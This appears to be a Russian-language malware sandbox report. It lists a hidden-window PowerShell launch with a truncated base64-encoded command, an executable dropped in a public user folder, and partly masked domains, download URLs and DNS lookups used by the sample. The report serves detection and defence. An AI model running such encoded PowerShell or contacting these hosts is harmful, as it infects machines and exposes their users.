Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAoACcAVAAnACsAJwBlAG8AbgBzACcAKwAnAGEAZAAnACsAJwBhACcAKwAnAHMAZAAgAD0AIAAmACgAJwArACcASABDAFMAbgBIACcAKwAnAEMAJwArACcAUwArACcAKwAnAEgAQwBTACcAKwAnAGUASABDAFMAKwAnACsAJw...
- C:\users\public\107596.exe
- C:\users\public\107596.exe
- 'fe###uco.com':80
- 'su##rdot.rs':80
- 'su##rdot.rs':443
- 'st#####consulting.com':80
- http://fe###uco.com/iCMlUjhB5b/
- http://su##rdot.rs/SZNlZMarN3/
- http://st#####consulting.com/pR6tPn/
- 'su##rdot.rs':443
- DNS ASK fe###uco.com
- DNS ASK ri###fos.com.br
- DNS ASK tr#####ntmediagroup.com
- DNS ASK su##rdot.rs
- DNS ASK st#####consulting.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAoACcAVAAnACsAJwBlAG8AbgBzACcAKwAnAGEAZAAnACsAJwBhACcAKwAnAHMAZAAgAD0AIAAmACgAJwArACcASABDAFMAbgBIACcAKwAnAEMAJwArACcAUwArACcAKwAnAEgAQwBTACcAKwAnAGUASABDAFMAKwAnACsAJw... (со скрытым окном)